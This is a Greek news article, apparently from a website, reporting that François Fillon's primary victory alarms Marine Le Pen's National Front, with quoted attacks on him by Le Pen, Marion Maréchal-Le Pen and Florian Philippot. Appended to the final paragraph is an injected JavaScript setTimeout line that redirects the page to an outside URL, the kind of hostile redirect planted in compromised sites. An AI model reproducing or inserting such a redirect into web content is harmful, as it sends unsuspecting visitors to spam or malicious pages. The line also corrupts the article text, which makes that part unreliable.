Συναγερμό σήμανε στο Εθνικό Μέτωπο της Λεπέν η νίκη Φιγιόν

0
10

 

Επιχείρηση αποδόμησης του προφίλ του υποψηφίου των Κεντροδεξιών για την προεδρία του 2017 στη Γαλλία ξεκινούν στο Εθνικό Μέτωπο καθώς όλες οι δημοσκοπήσεις αναδεικνύουν τον Φρανσουά Φιγιόν τον μόνο ικανό αντίπαλο απέναντι στην ακροδεξιά Μαρίν Λεπέν.

Μόνο τη γαλλική Ακροδεξιά βρήκε απροετοίμαστη η νίκη του Φιγιόν που κέρδισε το 70% των ψήφων του κόμματός του για το χρίσμα του υποψηφίου στην προεδρία ενώ πολλοί κάνουν λόγο για «άσχημο νέο» για τη Μαρίν Λεπέν.

Η νίκη του σήμανε συναγερμό στο Εθνικό Μέτωπο και η επίθεση κατά του νέου ηγέτη της Δεξιάς μεθοδεύεται στο οικονομικό πεδίο και ιδιαίτερα στον κοινωνικό τομέα και την Ευρώπη.

«Είναι το χειρότερο πρόγραμμα κοινωνικής διάλυσης που υπήρξε ποτέ», δήλωσε η Μαρίν Λεπέν, προσθέτοντας ότι «είναι και το χειρότερο φιλοευρωπαϊκό πρόγραμμα. Ποτέ άλλοτε ένας υποψήφιος δεν πήγε τόσο μακριά σε υποταγή στις υπερ-φιλελεύθερες απαιτήσεις της ΕΕ».

Έντονη είναι και η ανησυχία στα «παραδοσιακά εδάφη» της Ακροδεξιάς όπως νότιο-ανατολικά στην εκλογική περιφέρεια γύρω από τη Μασσαλία (Paca), όπου «αφεντικό» είναι η ανιψιά της Μαρίν Λεπέν,  Μαριόν Μαρεσάλ Λεπέν. Η περιοχή Paca θεωρείται επίσης «παραδοσιακή» και για τον Σαρκοζί.

Με tweet της αμέσως μετά τη νίκη Φιγιόν η Μαριόν θέτει το ερώτημα: «Ο Φρανσουά Φιγιόν κατά του λαού, χθες, σήμερα και αύριο;».

Με προηγούμενες δηλώσεις της, προαισθανόμενη τον κίνδυνο μιας νίκης Φιγιόν, δεν είχε διστάσει να τον κατηγορήσει για «εκλογική απάτη» σχετικά με τις θέσεις του για θέματα όπως εθνική ταυτότητα και κυριαρχία ή για τις μεταρρυθμίσεις που υποσχόταν.

«Θα πρέπει να αποδομήσουμε αυτήν την πολιτική μανούβρα, πράγμα που θα προσθέσει μια επιπλέον πολυπλοκότητα για μας» δήλωσε η Μαριόν Μαρεσάλ Λεπέν.

Και ο αντιπρόεδρος του κόμματος ο Φλοριάν Φιλιπό αντέδρασε με τουϊτ δηλώνοντας ότι «ο αληθινός Φιγιόν σημαίνει επιστροφή στο 19ο αιώνα, ενόσω συνεχίζεται το χάος με το μεταναστευτικό, την Ευρωπαϊκή Ένωση, την απάτη κ.ά.». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here